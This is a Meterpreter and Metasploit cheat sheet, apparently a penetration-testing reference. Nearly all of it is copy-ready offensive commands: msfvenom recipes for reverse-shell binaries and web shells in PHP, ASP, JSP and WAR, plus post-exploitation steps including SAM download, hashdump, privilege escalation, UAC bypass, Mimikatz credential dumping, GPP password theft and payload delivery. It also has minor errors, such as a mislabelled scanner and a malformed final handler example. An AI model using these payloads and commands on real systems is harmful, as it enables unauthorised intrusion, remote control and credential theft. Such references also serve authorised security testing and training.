🐮Meterpreter Cheat Sheet

Windows reverse meterpreter payload

• Copy

  set payload windows/meterpreter/reverse_tcp

  • Windows reverse tcp payload

Windows VNC Meterpreter payload

• Copy

  set payload windows/vncinject/reverse_tcp

  • Meterpreter Windows VNC Payload

• Copy

  set ViewOnly false

Linux Reverse Meterpreter payload

• Copy

  set payload linux/meterpreter/reverse_tcp

  • Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

• Copy

  upload file c:\\windows

  • Meterpreter upload file to Windows target

• Copy

  download c:\\windows\\repair\\sam /tmp

  • Meterpreter download file from Windows target

• Copy

  download c:\\windows\\repair\\sam /tmp

  • Meterpreter download file from Windows target

• Copy

  execute -f c:\\windows\temp\exploit.exe

  • Meterpreter run .exe on target – handy for executing uploaded exploits

• Copy

  execute -f cmd -c

  • Creates new channel with cmd shell

• Copy

  ps

  • Meterpreter show processes

• Copy

  shell

  • Meterpreter get shell on the target

• Copy

  getsystem

  • Meterpreter attempts priviledge escalation the target

• Copy

  hashdump

  • Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)

• Copy

  portfwd add –l 3389 –p 3389 –r target

  • Meterpreter create port forward to target machine

• Copy

  portfwd delete –l 3389 –p 3389 –r target

  • Meterpreter delete port forward

• Copy

  use exploit/windows/local/bypassuac

  • Bypass UAC on Windows 7 + Set target + arch, x86/64

• Copy

  use auxiliary/scanner/http/dir_scanner

  • Metasploit HTTP directory scanner

• Copy

  use auxiliary/scanner/http/jboss_vulnscan

  • Metasploit JBOSS vulnerability scanner

• Copy

  use auxiliary/scanner/mssql/mssql_login

  • Metasploit MSSQL Credential Scanner

• Copy

  use auxiliary/scanner/mysql/mysql_version

  • Metasploit MSSQL Version Scanner

• Copy

  use auxiliary/scanner/oracle/oracle_login

  • Metasploit Oracle Login Module

• Copy

  use exploit/multi/script/web_delivery

  • Metasploit powershell payload delivery module

• Copy

  post/windows/manage/powershell/exec_powershell

  • Metasploit upload and run powershell script through a session

• Copy

  use exploit/multi/http/jboss_maindeployer

  • Metasploit JBOSS deploy

• Copy

  use exploit/windows/mssql/mssql_payload

  • Metasploit MSSQL payload

• Copy

  run post/windows/gather/win_privs

  • Metasploit show privileges of current user

• Copy

  use post/windows/gather/credentials/gpp

  • Metasploit grab GPP saved passwords

• Copy

  load kiwi

• Copy

  creds_all

  • Metasploit load Mimikatz/kiwi and get creds

• Copy

  run post/windows/gather/local_admin_search_enum

  • Idenitfy other machines that the supplied domain user has administrative access to

• Copy

  set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

• Copy

  msfvenom –l

  • List options

Binaries

• Copy

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

• Copy

  msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

• Copy

  msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

• Copy

  msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php

  • PHP

• Copy

  set payload php/meterpreter/reverse_tcp           

  • Listener

• Copy

  cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

  • PHP

• Copy

  msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

  • ASP

• Copy

  msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

  • JSP

• Copy

  msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

  • WAR

Scripting Payloads

• msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

  • Python

• Copy

  msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

  • Bash

• Copy

  msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

  • Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

• Copy

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

• Copy

  msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

• Copy

  msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z

An example is:

msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension